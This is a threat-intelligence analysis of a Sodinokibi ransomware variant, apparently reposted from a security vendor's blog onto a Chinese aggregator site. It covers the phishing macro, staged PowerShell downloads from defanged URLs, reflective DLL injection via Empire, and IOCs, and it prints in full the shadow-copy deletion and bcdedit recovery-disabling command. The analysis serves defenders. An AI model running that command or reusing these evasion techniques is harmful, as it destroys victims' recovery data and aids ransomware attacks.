Analysis of Sodinokibi Ransomware Variant

栏目: IT技术 · 发布时间: 4年前

内容简介:CyOps, Cynet SOC team, recently encountered a new variant of the Sodinokibi ransomware, discovering several interesting traits. In this article we share a detailed analysis.Sodinokibi Ransomware’s affiliates use a wide range of tactics to distribute the ra

Summary

CyOps, Cynet SOC team, recently encountered a new variant of the Sodinokibi ransomware, discovering several interesting traits. In this article we share a detailed analysis.

Sodinokibi Ransomware’s affiliates use a wide range of tactics to distribute the ransomware and earn money. This is shown in a wave of attacks involving the breaching of legitimate websites and replacing of downloaded files with the infected Sodinokibi file, hacking into managed service providers (MSPs) to push Sodinokibi to managed endpoints, and by utilizing spam campaigns for a wide net.

In this case, the Sodinokibi ransomware distributed itself through a phishing email that contained an attachment to lure users to download and open the file containing the malicious payload. Sodinokibi ransomware used a “weaponized” Word document containing VBA macros that act as droppers. The malicious document asks the user to enable macros Analysis of Sodinokibi Ransomware Variant ). If macros are already enabled, they will execute automatically via AutoOpen function. Overall, the VBA code executes a multi-stage high obfuscation PowerShell script in the attempt to evade AV and security solutions. Additionally, it uses advanced techniques to evade sandboxes.

Fileless attacks such as this have been significantly evolving since 2017 and pose severe challenges to both signature-based and behavioral security tools.

(To learn more how Cynet can help you protect from any type of Ransomware, clickhere)

Investigation Overview

During our investigation, we discovered the following information:

According to the process tree relationship, PowerShell was spawned by WINWORD.EXE that opened a file named “info_17.07.doc”. We discovered the same behavior for another Word file named “VolontariDipendenti-addestramento-congiunto8-12Luglio.doc” and we assume there are more instances of the malicious Office file with different names / hashes.

Analysis of Sodinokibi Ransomware Variant

Analysis of Sodinokibi Ransomware Variant

Once the malicious VBA has been executed, a base64 encoded command was executed through PowerShell.

Analysis of Sodinokibi Ransomware Variant

The decoded command reveals another stage of obfuscation and encoded command:

Analysis of Sodinokibi Ransomware Variant

After decoding the above stage, we received a simple PowerShell code:

Analysis of Sodinokibi Ransomware Variant

The above code attempts to download and execute an executable file named ‘KiLrd.exe’ from malicious URL ‘ hxxp://fcamylleibrahim[.]top/sywo/fgoow[.]php?l=dxclass2.gxl ‘.

The executable file is saved to the User directory folder known as the environment variable as ‘$env:userprofile’ (“C:\Users\user_name”).

We have tried to download the executable file, but unfortunately the malicious URL was not available during the investigation.

The code further attempts to download additional code from another URL: ‘hxxp://185[.]193[.]141[.]248/gs[.]php’:

Analysis of Sodinokibi Ransomware Variant

This code first checks the host’s processor architecture in order to start the right instance of PowerShell (32 bit or 64bit), then it starts the PowerShell process which invokes a relative-long code that resides in an additional URL: ‘hxxps://pastebin[.]com/raw/CY2EEMJN’.

The code turns out to be an Empire module (as explained below) of which the source code is examined in Empire GitHub project:

https://github.com/EmpireProject/Empire/blob/master/data/module_source/code_execution/Invoke-ReflectivePEInjection.ps1

Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merging of the previous PowerShell Empire and Python EmPyre projects. The Empire framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

The attackers use the module above in order to reflectively load a DLL file (that turns out to be  ransomware) into the PowerShell process, the DLL is loaded from memory and not from the disk. This is known as an evasion technique to bypass the Anti-Virus software.

The attackers created a byte array containing the malicious DLL file that reflectively loads and hardcodes the byte array into the script. One advantage of doing this is that they can encrypt the byte array and decrypt it in memory, which bypasses Anti-Virus engines.

This is a small part from the Empire script of the attackers, it is a DLL encoded in base64 and converted to a byte array:

Analysis of Sodinokibi Ransomware Variant

Analysis of Sodinokibi Ransomware Variant

Once this module is running with PowerShell, the malicious DLL executes itself within the PowerShell process memory and encrypts the files of the infected machine, and then drops an instructions file in order to ask the user to pay ransom for decrypting the encrypted files.

This ransomware places ransom messages in folders that contain encrypted files. The name of the text file depends on the extension added to the encrypted file and are generated randomly.

For example, if the extension is “. qv 05z ” the ransom message filename will be called “ qv05z -readme.txt “. Sodinokibi also changes the Desktop wallpaper.

The ransomware encrypts the files and changes the desktop wallpaper, also dumping a txt file for instructions on how to pay the ransom for decrypting the files, as you can see in the screenshots below

Analysis of Sodinokibi Ransomware Variant

Analysis of Sodinokibi Ransomware Variant

Analysis of Sodinokibi Ransomware Variant

Attack Flow

Here you can see the process tree when the PowerShell command has executed:

Analysis of Sodinokibi Ransomware Variant

We can see that the vssadmin.exe process spawned by cmd.exe in order to remove shadow copies of the files disables Windows recovery and repair functions at the boot stage, using the command:

C: \ Windows \ System32 \ cmd.exe “/ c vssadmin.exe Delete Shadows / All / Quiet bcdedit / set {default} recoveryenabled No & bcdedit / set {default} bootstatuspolicy ignoreallfailures

Analysis of Sodinokibi Ransomware Variant

Analysis of Sodinokibi Ransomware Variant

This variant of the ‘Sodinokibi’ ransomware is new around the network and we can see that the creation time is from the last week. It is also new in VirusTotal:

Analysis of Sodinokibi Ransomware Variant

Summary of IOC

  • SHA256 :

c20e4249716805ab2c8645de65874797a2671ae16a30b9f1625ceb5f4bdd3ae6 – DLL FILE

  • Network IOC:

IP address : 185.193.141.248

URL :  hxxp://185[.]193[.]141[.]248/gs[.]php

hxxp://fcamylleibrahim[.]top/sywo/fgoow[.]php?l=dxclass2.gxl

Domain :  fcamylleibrahim[.]top

  • File Location:

“C:\Users\user\KiLrd.exe”

Cynet Detection and Protection

This type of attack was detected and blocked by Cynet using several detection mechanisms:

Analysis of Sodinokibi Ransomware Variant Analysis of Sodinokibi Ransomware Variant

Analysis of Sodinokibi Ransomware Variant


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

性能之巅

性能之巅

Brendan Gregg / 徐章宁、吴寒思、陈磊 / 电子工业出版社 / 2015-8-15 / 128

《性能之巅:洞悉系统、企业与云计算》基于Linux 和Solaris 系统阐述了适用于所有系统的性能理论和方法,Brendan Gregg 将业界普遍承认的性能方法、工具和指标收集于本书之中。阅读本书,你能洞悉系统运作的方式,学习到分析和提高系统与应用程序性能的方法,这些性能方法同样适用于大型企业与云计算这类最为复杂的环境的性能分析与调优。一起来看看 《性能之巅》 这本书的介绍吧!

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具